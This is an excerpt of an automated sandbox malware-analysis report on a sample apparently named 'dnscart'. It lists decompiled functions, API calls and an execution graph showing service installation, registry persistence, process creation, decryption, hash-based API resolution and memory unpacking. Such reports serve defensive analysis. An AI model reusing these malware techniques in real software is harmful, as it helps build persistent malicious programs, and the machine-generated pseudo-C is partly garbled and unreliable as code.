    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 22%
    			E001F8656(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
    				void _t28;
    				intOrPtr _t31;
    				void* _t32;
    				void* _t35;
    				void* _t37;
    				intOrPtr* _t40;
    				void* _t42;
    				void* _t44;
    
    				_t40 = __edi;
    				_t37 = __edx;
    				_t32 = __ebx;
    				if(L001F1D40(__ecx) != 0) {
    					goto 0x331674;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					if(L001F1E80(_t10, __ecx, _t37) != 0) {
    						goto 0x33168c;
    						asm("int3");
    						asm("int3");
    						if(L001F2560(_t37, _t40) != 0) {
    							_t35 =  *(_t44 - 0x10);
    							_t28 =  *_t35;
    							 *_t32 = _t28;
    							if(_t28 < 0x4000000) {
    								_push(_t32);
    								_t31 = L001F8500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
    								_t35 =  *(_t44 - 0x10);
    								 *_t40 = _t31;
    							}
    							HeapFree(GetProcessHeap(), 0, _t35);
    						}
    						HeapFree(GetProcessHeap(), ??, ??);
    					}
    					 *0x1fc260( *((intOrPtr*)(_t44 - 0x30)));
    				}
    				 *0x1fc260( *((intOrPtr*)(_t44 - 0x34)));
    				 *0x1fc260( *((intOrPtr*)(_t44 - 0x38)));
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t42);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t40 != 0x00000000;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F86F1
    • HeapFree.KERNEL32(00000000), ref: 001F86F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F8701
    • HeapFree.KERNEL32(00000000), ref: 001F8708
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • GetProcessHeap.KERNEL32 ref: 001F992A
    • HeapFree.KERNEL32(00000000), ref: 001F9931
    • GetProcessHeap.KERNEL32(00000000,?,?,00000001), ref: 001F994A
    • HeapFree.KERNEL32(00000000), ref: 001F9951
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

    Execution Graph

    Execution Coverage:7.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:12.8%
    Total number of Nodes:525
    Total number of Limit Nodes:19

    Graph

6390->6392 6392->6390 6592 22a658 WriteFile CloseHandle memset CreateProcessW 6593 22a6a4 CloseHandle 6592->6593 6594 22a6b6 GetProcessHeap HeapFree 6592->6594 6595 22a6b0 CloseHandle 6593->6595 6595->6594 6596 221ae1 LoadLibraryW 6597 221aeb 6596->6597 6598 2297dc OpenServiceW 6599 229957 CloseServiceHandle 6598->6599 6397 228d46 WideCharToMultiByte 6398 228d53 GetProcessHeap HeapFree 6397->6398 6131 229f42 6139 221be0 GetPEB 6131->6139 6133 229f47 6134 221be0 GetPEB 6133->6134 6135 229f6c 6134->6135 6136 229f78 GetProcessHeap RtlAllocateHeap 6135->6136 6137 229fbb ExitProcess 6136->6137 6138 229f95 6136->6138 6138->6137 6140 221bfc 6139->6140 6402 2285df 6403 221830 6402->6403 6404 2285e6 _snwprintf GetProcessHeap HeapFree 6403->6404 6405 22863e 6404->6405 6406 2286ed GetProcessHeap HeapFree GetProcessHeap HeapFree 6405->6406 6407 22870e 6406->6407 6601 22992a GetProcessHeap HeapFree 6602 22993d ChangeServiceConfig2W GetProcessHeap HeapFree 6601->6602 6603 229957 CloseServiceHandle 6601->6603 6602->6603 6605 2284c0 6606 2284c9 6605->6606 6607 2284e9 6606->6607 6608 2284d0 GetProcessHeap HeapFree 6606->6608 6609 221e50 GetLastError 6609->6609 6610 221e59 6609->6610 6611 22259b RtlAllocateHeap 6612 2225b4 CryptDuplicateHash 6611->6612 6613 222655 6611->6613 6614 2225d4 memcpy CryptDecrypt 6612->6614 6615 222633 GetProcessHeap HeapFree 6612->6615 6616 222604 CryptVerifySignatureW 6614->6616 6617 222626 CryptDestroyHash 6614->6617 6615->6613 6616->6617 6617->6613 6617->6615 6177 22982e GetProcessHeap RtlAllocateHeap 6178 229848 CloseServiceHandle 6177->6178 6408 22891e VirtualFree CloseHandle GetProcessHeap HeapFree 6411 228915 6408->6411 6409 228958 6410 228904 WaitForSingleObject 6410->6411 6411->6409 6411->6410 6619 2216d3 memset CreateProcessW 6620 221691 GetLastError 6619->6620 6621 221711 WaitForSingleObject CloseHandle CloseHandle CloseHandle CloseHandle 6619->6621 6623 2216a6 SetEvent CloseHandle CloseHandle 6620->6623 6624 2216cb 6620->6624 6625 2216c0 
6623->6625 6412 221932 CreateDirectoryW 6413 22193c GetLastError 6412->6413 6414 221900 6412->6414 6413->6414 6215 2290be memset 6216 221830 6215->6216 6217 2290e2 _snwprintf GetProcessHeap HeapFree CreateMutexW 6216->6217 6218 229126 WaitForSingleObject 6217->6218 6219 22929f CryptDestroyHash CryptDestroyKey CryptDestroyKey CryptReleaseContext 6217->6219 6220 229132 6218->6220 6221 2292d6 6219->6221 6220->6219 6222 22a7a0 4 API calls 6221->6222 6223 2292de 6222->6223 6628 221c60 memset ObtainUserAgentString 6629 221c8f 6628->6629 6415 229c6c Sleep 6416 229c77 6415->6416 6417 229c26 6415->6417 6418 229c30 GetLastError 6417->6418 6419 229c3f 6417->6419 6418->6417 6420 228b0d 6421 228b11 WaitForSingleObject 6420->6421 6422 228b66 6420->6422 6423 228b23 6421->6423 6423->6421 6423->6422 6632 2286c5 GetProcessHeap HeapFree 6633 2286d2 InternetCloseHandle 6632->6633 6634 2286db InternetCloseHandle InternetCloseHandle 6633->6634 6635 2286ed GetProcessHeap HeapFree GetProcessHeap HeapFree 6634->6635 6636 22870e 6635->6636 6252 2294c1 6253 221830 6252->6253 6254 2294c6 7 API calls 6253->6254 6255 229549 6254->6255 6256 2295a2 GetComputerNameW 6254->6256 6255->6256 6257 22965b 6256->6257 6258 2295c0 GetProcessHeap RtlAllocateHeap 6256->6258 6260 229614 _snprintf GetProcessHeap HeapFree 6258->6260 6260->6257 6637 2295d0 6638 2295d8 6637->6638 6638->6637 6639 2295fd GetProcessHeap RtlAllocateHeap 6638->6639 6640 229614 _snprintf GetProcessHeap HeapFree 6639->6640 6642 22965b 6640->6642 6424 229c5c CreateProcessW 6425 229c66 6424->6425 6426 229c7e CloseHandle CloseHandle 6424->6426 6425->6426 6643 2297f3 EnumServicesStatusExW 6644 229818 GetLastError 6643->6644 6645 229829 CloseServiceHandle 6643->6645 6644->6645 6651 22a86b 6653 22a870 6651->6653 6652 22a8cc 6653->6652 6655 22a6e0 GetProcessHeap RtlAllocateHeap 6653->6655 6656 22a704 memcpy GetProcessHeap RtlAllocateHeap 6655->6656 6657 22a791 6655->6657 6658 22a741 CreateThread 6656->6658 6659 22a781 GetProcessHeap HeapFree 
6656->6659 6657->6653 6660 22a771 GetProcessHeap HeapFree 6658->6660 6661 22a761 6658->6661 6659->6657 6660->6659 6661->6653 6647 221a20 6648 221a35 6647->6648 6649 221be0 GetPEB 6648->6649 6650 221ad5 6649->6650 6285 22191e GetFileAttributesW 6286 221900 6285->6286 6662 222b5f 6663 222c0a 6662->6663 6667 222b67 6662->6667 6664 222c35 memcpy 6666 222c83 6664->6666 6665 222cdb memcpy 6665->6663 6665->6666 6666->6665 6668 222d75 6666->6668 6667->6663 6667->6664 6667->6666 6099 2291f0 CreateEventW 6100 229229 ReleaseMutex CloseHandle 6099->6100 6101 2291ff SignalObjectAndWait 6099->6101 6102 22923b GetTickCount CreateTimerQueueTimer 6100->6102 6103 22929f CryptDestroyHash CryptDestroyKey CryptDestroyKey CryptReleaseContext 6100->6103 6104 22921b ResetEvent 6101->6104 6105 229214 6101->6105 6106 229293 CloseHandle 6102->6106 6107 229278 WaitForSingleObject DeleteTimerQueueTimer 6102->6107 6108 2292d6 6103->6108 6104->6100 6105->6100 6105->6104 6106->6103 6107->6106 6111 22a7a0 6108->6111 6112 2292de 6111->6112 6113 22a7b4 WaitForSingleObject 6111->6113 6114 22a7c5 CloseHandle GetProcessHeap HeapFree 6113->6114 6115 22a7e4 6113->6115 6114->6115 6115->6112 6115->6113 6116 212a02 6117 212a19 6116->6117 6122 211c91 VirtualAlloc 6117->6122 6119 212a3c 6124 212663 6119->6124 6123 211cee 6122->6123 6123->6119 6129 2123f0 VirtualAlloc 6124->6129 6126 2126ab 6127 212835 VirtualProtect 6126->6127 6128 212781 VirtualProtect 6126->6128 6127->6126 6128->6126 6130 2124be 6129->6130 6130->6126 6669 227469 memcpy 6670 227464 6669->6670 6671 229793 OpenSCManagerW 6672 2297a6 6671->6672 6427 22a7f6 6428 22a803 6427->6428 6430 22a82a 6427->6430 6428->6428 6429 22a80c GetProcessHeap RtlAllocateHeap 6428->6429 6429->6430 6430->6430 6175 229960 StartServiceW CloseServiceHandle 6176 22996d CloseServiceHandle 6175->6176 6431 2224c8 CryptExportKey 6435 2224ec CryptDestroyHash 6431->6435 6433 222536 GetProcessHeap HeapFree 6434 222554 6433->6434 6435->6433 6435->6434 6436 229a53 6437 221830 
6436->6437 6438 229a5a RegCreateKeyExW 6437->6438 6439 229a7f RegSetValueExW RegCloseKey 6438->6439 6440 229aa9 6438->6440 6439->6440 6180 228e20 GetTickCount 6181 228e3c 6180->6181 6182 228e52 6180->6182 6181->6182 6183 228e63 6181->6183 6184 228ef4 6181->6184 6183->6182 6186 228e7e SetEvent 6183->6186 6185 228f10 lstrlen 6184->6185 6187 228f40 6185->6187 6188 229035 GetProcessHeap HeapFree GetProcessHeap HeapFree 6187->6188 6190 229022 GetProcessHeap HeapFree 6187->6190 6192 22a7a0 4 API calls 6187->6192 6193 228fec GetProcessHeap HeapFree 6187->6193 6194 2288f0 6187->6194 6188->6187 6189 229063 GetTickCount GetProcessHeap HeapFree 6188->6189 6189->6182 6190->6188 6192->6187 6193->6190 6195 228958 6194->6195 6196 228904 WaitForSingleObject 6194->6196 6195->6187 6197 228915 6196->6197 6197->6195 6197->6196 6441 228d12 WideCharToMultiByte 6442 228d1e GetProcessHeap RtlAllocateHeap 6441->6442 6444 228d34 GetProcessHeap HeapFree 6441->6444 6442->6444 6445 228b78 6449 2219e0 6445->6449 6448 228b92 6450 2219ea GetCurrentProcessId 6449->6450 6450->6448 6451 221d0f InternetConnectW 6452 221d1c 6451->6452 6453 221d2f InternetCloseHandle 6451->6453 6454 221d37 6453->6454 6674 228a5e 6676 2289e3 6674->6676 6675 228abb GetProcessHeap HeapFree 6675->6676 6676->6675 6677 228a6a 6676->6677 6678 228a41 GetProcessHeap RtlAllocateHeap 6676->6678 6678->6676 6455 229c17 WriteFile CloseHandle 6456 229c24 6455->6456 6457 229c30 GetLastError 6456->6457 6458 229c3f 6456->6458 6457->6456 6459 22985f EnumServicesStatusExW 6461 229922 6459->6461 6462 22986d 6459->6462 6460 229898 OpenServiceW 6460->6462 6462->6460 6462->6461 6262 2297b3 CreateServiceW 6263 2297d7 6262->6263 6463 228966 6464 228973 6463->6464 6466 22899a 6463->6466 6464->6464 6465 22897c GetProcessHeap RtlAllocateHeap 6464->6465 6465->6466 6679 2227c6 GetProcessHeap RtlAllocateHeap 6680 2293e3 6681 2293ea 6680->6681 6682 2293f2 lstrlen 6681->6682 6683 229404 6682->6683 6467 2285aa 6470 228740 6467->6470 6473 228753 
6470->6473 6471 228779 GetProcessHeap RtlAllocateHeap 6472 2285af 6471->6472 6475 228799 6471->6475 6473->6471 6473->6473 6474 2287e0 memcpy 6474->6472 6475->6474 6475->6475 6684 2282dc 6685 22833a 6684->6685 6686 228351 memset memset 6684->6686 6685->6686 6687 221e20 GetLastError 6687->6687 6688 221e29 HttpQueryInfoW 6687->6688 6689 221e4b 6688->6689 6690 221e63 InternetCloseHandle 6688->6690 6689->6690

    Executed Functions

    C-Code - Quality: 22%
    			E002291F0(signed int __ecx) {
    				void* _t3;
    				long _t12;
    				long _t19;
    				int _t21;
    				signed int _t23;
    				void* _t25;
    				void* _t28;
    
    				_t23 = __ecx;
    				_t3 = CreateEventW(??, ??, ??, ??);
    				 *0x22c29c = _t3;
    				if(_t3 != 0) {
    					_t19 = SignalObjectAndWait(_t3,  *0x22c2a0, 0xffffffff, 0);
    					if(_t19 == 0 || _t19 == 0x80) {
    						_t21 = ResetEvent( *0x22c29c);
    					}
    				}
    				ReleaseMutex(_t25);
    				CloseHandle(_t25);
    				if(_t21 != 0) {
    					_t12 = GetTickCount(); // executed
    					_push(0x10);
    					_push(0x3e8);
    					_push(0x1388);
    					_push(0);
    					 *0x22c280 = 1;
    					_push(E00228E20);
    					 *0x22c278 = _t12 + 0x1388;
    					_push(0);
    					_push(_t28 - 8);
    					if( *0x22c188() != 0) {
    						WaitForSingleObject( *0x22c29c, 0xffffffff);
    						 *0x22c11c(0,  *((intOrPtr*)(_t28 - 8)), 0xffffffff);
    					}
    					CloseHandle( *0x22c29c);
    				}
    				 *0x22c048( *0x22c288); // executed
    				CryptDestroyKey( *0x22c28c); // executed
    				CryptDestroyKey( *0x22c290); // executed
    				CryptReleaseContext( *0x22c284, 0); // executed
    				E00228AE0(_t21);
    				return E0022A7A0(_t23 | 0xffffffff);
    			}

    APIs
    • CreateEventW.KERNEL32 ref: 002291F0
    • SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 0022920A
    • ResetEvent.KERNEL32 ref: 00229221
    • ReleaseMutex.KERNEL32 ref: 0022922A
    • CloseHandle.KERNEL32 ref: 00229231
    • GetTickCount.KERNEL32 ref: 0022923B
    • CreateTimerQueueTimer.KERNEL32(?,00000000,Function_00008E20,00000000,00001388,000003E8,00000010), ref: 0022926E
    • WaitForSingleObject.KERNEL32(000000FF), ref: 00229280
    • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 0022928D
    • CloseHandle.KERNEL32 ref: 00229299
    • CryptDestroyHash.ADVAPI32 ref: 002292A5
    • CryptDestroyKey.ADVAPI32 ref: 002292B1
    • CryptDestroyKey.ADVAPI32 ref: 002292BD
    • CryptReleaseContext.ADVAPI32(00000000), ref: 002292CB
      • Part of subcall function 0022A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
      • Part of subcall function 0022A7A0: CloseHandle.KERNEL32(?), ref: 0022A7CC
      • Part of subcall function 0022A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
      • Part of subcall function 0022A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    C-Code - Quality: 18%
    			E0022914E(void* __ecx, void* __edx, void* __eflags) {
    				void* _t21;
    				void* _t28;
    				long _t31;
    				long _t38;
    				int _t40;
    				void* _t47;
    				void* _t49;
    				void* _t50;
    				void* _t52;
    
    				asm("scasb");
    				asm("int3");
    				L00221830(__ecx, __edx);
    				_t49 =  *(_t52 - 4);
    				 *0x22c20c(_t52 - 0x188, 0x40, _t49,  *0x22c27c);
    				HeapFree(GetProcessHeap(), 0, _t49);
    				L00221830(0x221264, 0xc);
    				_t50 =  *(_t52 - 4);
    				 *0x22c20c(_t52 - 0x108, 0x40, _t50,  *0x22c27c, 0x4b85ca91, _t52 - 4);
    				HeapFree(GetProcessHeap(), 0, _t50);
    				_t21 = CreateMutexW(0, 0, _t52 - 0x108); // executed
    				 *0x22c2a0 = _t21;
    				if(_t21 != 0) {
    					goto 0x231924;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					_t28 = CreateEventW();
    					 *0x22c29c = _t28;
    					if(_t28 != 0) {
    						_t38 = SignalObjectAndWait(_t28,  *0x22c2a0, 0xffffffff, 0);
    						if(_t38 == 0 || _t38 == 0x80) {
    							_t40 = ResetEvent( *0x22c29c);
    						}
    					}
    					ReleaseMutex(_t47);
    					CloseHandle(_t47);
    					if(_t40 != 0) {
    						_t31 = GetTickCount(); // executed
    						_push(0x10);
    						_push(0x3e8);
    						_push(0x1388);
    						_push(0);
    						 *0x22c280 = 1;
    						_push(E00228E20);
    						 *0x22c278 = _t31 + 0x1388;
    						_push(0);
    						_push(_t52 - 8);
    						if( *0x22c188() != 0) {
    							WaitForSingleObject( *0x22c29c, 0xffffffff);
    							 *0x22c11c(0,  *((intOrPtr*)(_t52 - 8)), 0xffffffff);
    						}
    						CloseHandle( *0x22c29c);
    					}
    				}
    				 *0x22c048( *0x22c288); // executed
    				CryptDestroyKey( *0x22c28c); // executed
    				CryptDestroyKey( *0x22c290); // executed
    				CryptReleaseContext( *0x22c284, 0); // executed
    				E00228AE0(_t40);
    				return E0022A7A0(0xffffffffffffffff);
    			}

    APIs
    • _snwprintf.NTDLL ref: 00229168
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229174
    • HeapFree.KERNEL32(00000000), ref: 0022917B
    • _snwprintf.NTDLL ref: 002291AC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 002291B8
    • HeapFree.KERNEL32(00000000), ref: 002291BF
    • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 002291D0
    • CryptDestroyHash.ADVAPI32 ref: 002292A5
    • CryptDestroyKey.ADVAPI32 ref: 002292B1
    • CryptDestroyKey.ADVAPI32 ref: 002292BD
    • CryptReleaseContext.ADVAPI32(00000000), ref: 002292CB
      • Part of subcall function 0022A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
      • Part of subcall function 0022A7A0: CloseHandle.KERNEL32(?), ref: 0022A7CC
      • Part of subcall function 0022A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
      • Part of subcall function 0022A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    C-Code - Quality: 17%
    			E002290BE(void* __eflags) {
    				void* _t22;
    				long _t29;
    				void* _t42;
    				void* _t43;
    				long _t46;
    				long _t53;
    				int _t55;
    				signed int _t57;
    				void* _t61;
    				void* _t63;
    				void* _t65;
    				void* _t66;
    				void* _t67;
    
    				_t55 = 0;
    				memset(0x22c284, 0, ??);
    				_t57 = 0x221364;
    				_t2 = _t55 + 0xc; // 0xc
    				_t59 = _t2;
    				L00221830(0x221364, _t2);
    				_t63 =  *(_t67 - 4);
    				 *0x22c20c(_t67 - 0x88, 0x40, _t63,  *0x22c27c, 0x4b85ca91, _t67 - 4);
    				HeapFree(GetProcessHeap(), 0, _t63);
    				_t22 = CreateMutexW(0, 0, _t67 - 0x88); // executed
    				_t61 = _t22;
    				if(_t61 != 0) {
    					_t29 = WaitForSingleObject(_t61, 0);
    					if(_t29 == 0 || _t29 == 0x80) {
    						goto 0x231903;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("scasb");
    						asm("int3");
    						L00221830(_t57, _t59);
    						_t65 =  *(_t67 - 4);
    						 *0x22c20c(_t67 - 0x188, 0x40, _t65,  *0x22c27c);
    						HeapFree(GetProcessHeap(), 0, _t65);
    						_t57 = 0x221264;
    						L00221830(0x221264, 0xc);
    						_t66 =  *(_t67 - 4);
    						 *0x22c20c(_t67 - 0x108, 0x40, _t66,  *0x22c27c, 0x4b85ca91, _t67 - 4);
    						HeapFree(GetProcessHeap(), 0, _t66);
    						_t42 = CreateMutexW(0, 0, _t67 - 0x108); // executed
    						 *0x22c2a0 = _t42;
    						if(_t42 != 0) {
    							goto 0x231924;
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							_t43 = CreateEventW();
    							 *0x22c29c = _t43;
    							if(_t43 != 0) {
    								_t53 = SignalObjectAndWait(_t43,  *0x22c2a0, 0xffffffff, 0);
    								if(_t53 == 0 || _t53 == 0x80) {
    									_t55 = ResetEvent( *0x22c29c);
    								}
    							}
    							ReleaseMutex(_t61);
    							CloseHandle(_t61);
    							if(_t55 != 0) {
    								_t46 = GetTickCount(); // executed
    								_push(0x10);
    								_push(0x3e8);
    								_push(0x1388);
    								_push(0);
    								 *0x22c280 = 1;
    								_push(E00228E20);
    								 *0x22c278 = _t46 + 0x1388;
    								_push(0);
    								_push(_t67 - 8);
    								if( *0x22c188() != 0) {
    									WaitForSingleObject( *0x22c29c, 0xffffffff);
    									 *0x22c11c(0,  *((intOrPtr*)(_t67 - 8)), 0xffffffff);
    								}
    								CloseHandle( *0x22c29c);
    							}
    						}
    					}
    				}
    				 *0x22c048( *0x22c288); // executed
    				CryptDestroyKey( *0x22c28c); // executed
    				CryptDestroyKey( *0x22c290); // executed
    				CryptReleaseContext( *0x22c284, 0); // executed
    				E00228AE0(_t55);
    				return E0022A7A0(_t57 | 0xffffffff);
    			}

    APIs
    • memset.NTDLL ref: 002290C6
    • _snwprintf.NTDLL ref: 002290F5
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229100
    • HeapFree.KERNEL32(00000000), ref: 00229107
    • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00229116
    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00229128
    • CryptDestroyHash.ADVAPI32 ref: 002292A5
    • CryptDestroyKey.ADVAPI32 ref: 002292B1
    • CryptDestroyKey.ADVAPI32 ref: 002292BD
    • CryptReleaseContext.ADVAPI32(00000000), ref: 002292CB
      • Part of subcall function 0022A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
      • Part of subcall function 0022A7A0: CloseHandle.KERNEL32(?), ref: 0022A7CC
      • Part of subcall function 0022A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
      • Part of subcall function 0022A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 25%
    			E00229960() {
    				void* _t6;
    				void* _t8;
    
    				StartServiceW(); // executed
    				CloseServiceHandle(_t8);
    				CloseServiceHandle(_t6);
    				return 1;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • EnumServicesStatusExW.ADVAPI32 ref: 0022985F
    • OpenServiceW.ADVAPI32(?,?,00000001), ref: 0022989D
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

    C-Code - Quality: 39%
    			E00229CB6(void* __ecx, void* __edx, void* __edi) {
    				struct HINSTANCE__* _t17;
    				struct HINSTANCE__* _t23;
    				struct HINSTANCE__* _t29;
    				struct HINSTANCE__* _t35;
    				struct HINSTANCE__* _t41;
    				struct HINSTANCE__* _t47;
    				struct HINSTANCE__* _t53;
    				struct HINSTANCE__* _t59;
    				void* _t63;
    				void* _t96;
    				void* _t97;
    				void* _t98;
    				void* _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t104;
    				void* _t106;
    
    				_t96 = __edi;
    				asm("scasb");
    				asm("int3");
    				L00221830(__ecx, __edx);
    				_t97 =  *(_t106 - 4);
    				_t17 = LoadLibraryW(_t97);
    				_push(0x22c040);
    				_push(0x30116feb);
    				_push(0x21);
    				L00221B10(_t17, 0x221040, _t96, _t97);
    				HeapFree(GetProcessHeap(), 0, _t97);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00221830(0x221568, 0xc);
    				_t98 =  *(_t106 - 4);
    				_t23 = LoadLibraryW(_t98);
    				_push(0x22c0c8);
    				_push(0x1f598772);
    				_push(1);
    				L00221B10(_t23, 0x221024, _t96, _t98);
    				HeapFree(GetProcessHeap(), 0, _t98);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00221830(0x221574, 0xc);
    				_t99 =  *(_t106 - 4);
    				_t29 = LoadLibraryW(_t99);
    				_push(0x22c214);
    				_push(0x41696925);
    				_push(2);
    				L00221B10(_t29, 0x221028, _t96, _t99);
    				HeapFree(GetProcessHeap(), 0, _t99);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00221830(0x221580, 0xc);
    				_t100 =  *(_t106 - 4);
    				_t35 = LoadLibraryW(_t100); // executed
    				_push(0x22c0c4);
    				_push(0x37dff52a);
    				_push(1);
    				L00221B10(_t35, 0x22100c, _t96, _t100);
    				HeapFree(GetProcessHeap(), 0, _t100);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00221830(0x221550, 0xc);
    				_t101 =  *(_t106 - 4);
    				_t41 = LoadLibraryW(_t101); // executed
    				_push(0x22c0cc);
    				_push(0x14c87d5f);
    				_push(1);
    				L00221B10(_t41, 0x2210c4, _t96, _t101);
    				HeapFree(GetProcessHeap(), 0, _t101);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00221830(0x221544, 0xc);
    				_t102 =  *(_t106 - 4);
    				_t47 = LoadLibraryW(_t102); // executed
    				_push(0x22c21c);
    				_push(0x786d5b64);
    				_push(2);
    				L00221B10(_t47, 0x2210c8, _t96, _t102);
    				HeapFree(GetProcessHeap(), 0, _t102);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00221830(0x221598, 0xc);
    				_t103 =  *(_t106 - 4);
    				_t53 = LoadLibraryW(_t103);
    				_push(0x22c230);
    				_push(0x53973344);
    				_push(0xe);
    				L00221B10(_t53, 0x221220, _t96, _t103);
    				HeapFree(GetProcessHeap(), 0, _t103);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L00221830(0x22158c, 0xc);
    				_t104 =  *(_t106 - 4);
    				_t59 = LoadLibraryW(_t104); // executed
    				_push(0x22c224);
    				_push(0x221bf2d2);
    				_push(3);
    				L00221B10(_t59, 0x221214, _t96, _t104);
    				HeapFree(GetProcessHeap(), 0, _t104); // executed
    				_t63 = L002292F0(_t59); // executed
    				return _t63;
    			}

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 00229CC4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229CE8
    • HeapFree.KERNEL32(00000000), ref: 00229CEF
    • LoadLibraryW.KERNEL32(?), ref: 00229D14
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229D38
    • HeapFree.KERNEL32(00000000), ref: 00229D3F
    • LoadLibraryW.KERNEL32(?), ref: 00229D64
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229D88
    • HeapFree.KERNEL32(00000000), ref: 00229D8F
    • LoadLibraryW.KERNEL32(?), ref: 00229DB4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00229DD8
    • HeapFree.KERNEL32(00000000), ref: 00229DDF
